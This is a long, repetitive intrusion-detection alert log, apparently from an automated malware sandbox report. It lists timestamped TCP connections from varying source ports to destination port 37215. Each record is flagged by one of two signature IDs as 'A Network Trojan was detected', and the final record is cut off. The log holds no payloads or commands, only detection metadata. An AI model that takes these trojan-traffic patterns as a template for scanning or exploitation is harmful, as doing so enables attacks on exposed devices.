                  Timestamp:05/28/24-08:59:16.661692
                  SID:2829579
                  Source Port:59412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543732
                  SID:2829579
                  Source Port:40320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870710
                  SID:2829579
                  Source Port:59032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650345
                  SID:2829579
                  Source Port:37502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555543
                  SID:2829579
                  Source Port:56454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785609
                  SID:2835222
                  Source Port:39462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650918
                  SID:2829579
                  Source Port:59662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694989
                  SID:2829579
                  Source Port:35106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790743
                  SID:2829579
                  Source Port:58414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494504
                  SID:2829579
                  Source Port:50624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845949
                  SID:2835222
                  Source Port:45218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.610322
                  SID:2835222
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657631
                  SID:2835222
                  Source Port:57160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651466
                  SID:2835222
                  Source Port:60070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312244
                  SID:2829579
                  Source Port:52268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586351
                  SID:2835222
                  Source Port:36366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787926
                  SID:2835222
                  Source Port:49630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.548217
                  SID:2835222
                  Source Port:36392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696405
                  SID:2829579
                  Source Port:49754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.511584
                  SID:2829579
                  Source Port:34710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495810
                  SID:2835222
                  Source Port:50814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660591
                  SID:2829579
                  Source Port:43246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555507
                  SID:2835222
                  Source Port:48438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536080
                  SID:2835222
                  Source Port:51770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578036
                  SID:2829579
                  Source Port:33512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543170
                  SID:2835222
                  Source Port:36614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847566
                  SID:2835222
                  Source Port:60420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496261
                  SID:2829579
                  Source Port:56672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529752
                  SID:2829579
                  Source Port:51788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660986
                  SID:2829579
                  Source Port:34324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859926
                  SID:2829579
                  Source Port:34962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788959
                  SID:2829579
                  Source Port:35796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886609
                  SID:2829579
                  Source Port:51570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.670712
                  SID:2829579
                  Source Port:51548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780563
                  SID:2829579
                  Source Port:52014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661258
                  SID:2829579
                  Source Port:60192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277853
                  SID:2829579
                  Source Port:49456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931662
                  SID:2829579
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.609863
                  SID:2829579
                  Source Port:39458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678794
                  SID:2835222
                  Source Port:48810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537212
                  SID:2835222
                  Source Port:43990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785616
                  SID:2829579
                  Source Port:43890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789860
                  SID:2829579
                  Source Port:35134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583189
                  SID:2829579
                  Source Port:45418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695196
                  SID:2835222
                  Source Port:58478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918139
                  SID:2835222
                  Source Port:33324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920130
                  SID:2829579
                  Source Port:40200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319102
                  SID:2835222
                  Source Port:50742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866500
                  SID:2829579
                  Source Port:53280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545269
                  SID:2829579
                  Source Port:48732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755576
                  SID:2835222
                  Source Port:34760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911177
                  SID:2829579
                  Source Port:57254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912526
                  SID:2835222
                  Source Port:40996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926645
                  SID:2835222
                  Source Port:47760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767772
                  SID:2835222
                  Source Port:54692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298111
                  SID:2829579
                  Source Port:41768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659277
                  SID:2829579
                  Source Port:45428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578622
                  SID:2835222
                  Source Port:53542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550699
                  SID:2829579
                  Source Port:39910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888607
                  SID:2829579
                  Source Port:42150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495960
                  SID:2829579
                  Source Port:33868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798056
                  SID:2835222
                  Source Port:52702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916881
                  SID:2829579
                  Source Port:38340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737602
                  SID:2829579
                  Source Port:38220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.912649
                  SID:2829579
                  Source Port:40270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298509
                  SID:2835222
                  Source Port:38644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296026
                  SID:2835222
                  Source Port:32942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496394
                  SID:2829579
                  Source Port:47126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483062
                  SID:2835222
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750094
                  SID:2829579
                  Source Port:59462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651140
                  SID:2829579
                  Source Port:40210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770955
                  SID:2835222
                  Source Port:47182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719236
                  SID:2835222
                  Source Port:38408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488139
                  SID:2829579
                  Source Port:39770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537030
                  SID:2829579
                  Source Port:43136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907255
                  SID:2829579
                  Source Port:46228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923040
                  SID:2835222
                  Source Port:47060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907486
                  SID:2829579
                  Source Port:34014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496255
                  SID:2829579
                  Source Port:42504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493056
                  SID:2835222
                  Source Port:42670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797191
                  SID:2835222
                  Source Port:47726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799476
                  SID:2829579
                  Source Port:41972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738132
                  SID:2829579
                  Source Port:50380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315620
                  SID:2835222
                  Source Port:52216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.609090
                  SID:2835222
                  Source Port:33962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659293
                  SID:2829579
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277358
                  SID:2829579
                  Source Port:36372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277368
                  SID:2829579
                  Source Port:38180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292655
                  SID:2829579
                  Source Port:59074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296752
                  SID:2829579
                  Source Port:36652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737525
                  SID:2835222
                  Source Port:56530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312382
                  SID:2835222
                  Source Port:58504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490252
                  SID:2829579
                  Source Port:54944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742808
                  SID:2829579
                  Source Port:48302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292664
                  SID:2835222
                  Source Port:46134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.719163
                  SID:2835222
                  Source Port:34980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.669572
                  SID:2835222
                  Source Port:58150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911192
                  SID:2829579
                  Source Port:42574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912552
                  SID:2829579
                  Source Port:52192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585512
                  SID:2835222
                  Source Port:48104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548204
                  SID:2835222
                  Source Port:46838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888032
                  SID:2835222
                  Source Port:59866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665537
                  SID:2835222
                  Source Port:49876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790237
                  SID:2835222
                  Source Port:57914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770798
                  SID:2829579
                  Source Port:36066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859410
                  SID:2835222
                  Source Port:34310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588368
                  SID:2835222
                  Source Port:57568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696359
                  SID:2829579
                  Source Port:60362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.514175
                  SID:2835222
                  Source Port:54294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293627
                  SID:2835222
                  Source Port:59372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.743042
                  SID:2835222
                  Source Port:58866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788049
                  SID:2835222
                  Source Port:41564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910531
                  SID:2835222
                  Source Port:43604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844967
                  SID:2829579
                  Source Port:40508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781081
                  SID:2835222
                  Source Port:33268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767562
                  SID:2829579
                  Source Port:40068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695164
                  SID:2829579
                  Source Port:42994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536975
                  SID:2829579
                  Source Port:36586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586922
                  SID:2835222
                  Source Port:60658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887272
                  SID:2835222
                  Source Port:33334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847693
                  SID:2829579
                  Source Port:53498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371969
                  SID:2829579
                  Source Port:33186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931602
                  SID:2829579
                  Source Port:37852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551131
                  SID:2829579
                  Source Port:39010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510246
                  SID:2835222
                  Source Port:32914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907665
                  SID:2829579
                  Source Port:40082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606325
                  SID:2829579
                  Source Port:56066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.879973
                  SID:2829579
                  Source Port:41438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768715
                  SID:2835222
                  Source Port:45434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767708
                  SID:2835222
                  Source Port:46474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911150
                  SID:2835222
                  Source Port:35432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775936
                  SID:2829579
                  Source Port:43564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649572
                  SID:2829579
                  Source Port:39192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545060
                  SID:2835222
                  Source Port:47140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547551
                  SID:2829579
                  Source Port:41964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719149
                  SID:2835222
                  Source Port:38526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652051
                  SID:2835222
                  Source Port:55972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576140
                  SID:2829579
                  Source Port:33928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649401
                  SID:2835222
                  Source Port:45466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910437
                  SID:2835222
                  Source Port:34924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278769
                  SID:2829579
                  Source Port:47854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578064
                  SID:2829579
                  Source Port:50516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555127
                  SID:2835222
                  Source Port:40966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920798
                  SID:2835222
                  Source Port:45078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591073
                  SID:2829579
                  Source Port:41250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315762
                  SID:2829579
                  Source Port:40344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720243
                  SID:2835222
                  Source Port:53372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661201
                  SID:2829579
                  Source Port:44230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785573
                  SID:2835222
                  Source Port:51396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.753898
                  SID:2835222
                  Source Port:39912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298970
                  SID:2835222
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843636
                  SID:2835222
                  Source Port:60744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.497187
                  SID:2835222
                  Source Port:47408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798100
                  SID:2835222
                  Source Port:33922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530976
                  SID:2835222
                  Source Port:55912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788976
                  SID:2829579
                  Source Port:47686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279347
                  SID:2835222
                  Source Port:59970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.682864
                  SID:2835222
                  Source Port:60736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810001
                  SID:2829579
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315736
                  SID:2829579
                  Source Port:44000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908546
                  SID:2835222
                  Source Port:37904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528844
                  SID:2835222
                  Source Port:47396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594396
                  SID:2829579
                  Source Port:38842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845169
                  SID:2835222
                  Source Port:41724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767742
                  SID:2835222
                  Source Port:34408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278881
                  SID:2835222
                  Source Port:41662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494426
                  SID:2835222
                  Source Port:41526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767880
                  SID:2829579
                  Source Port:44964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530492
                  SID:2835222
                  Source Port:42126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629234
                  SID:2835222
                  Source Port:60628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628769
                  SID:2835222
                  Source Port:42876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859361
                  SID:2829579
                  Source Port:57970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583751
                  SID:2835222
                  Source Port:42696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517482
                  SID:2835222
                  Source Port:57332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.700246
                  SID:2835222
                  Source Port:51836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.611107
                  SID:2835222
                  Source Port:39992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926390
                  SID:2829579
                  Source Port:48570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279337
                  SID:2829579
                  Source Port:45396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793579
                  SID:2835222
                  Source Port:60838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660776
                  SID:2835222
                  Source Port:48110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768773
                  SID:2835222
                  Source Port:38516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908571
                  SID:2829579
                  Source Port:41300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788316
                  SID:2829579
                  Source Port:47598
                  Destination Port:37215
                  Protocol:TCP
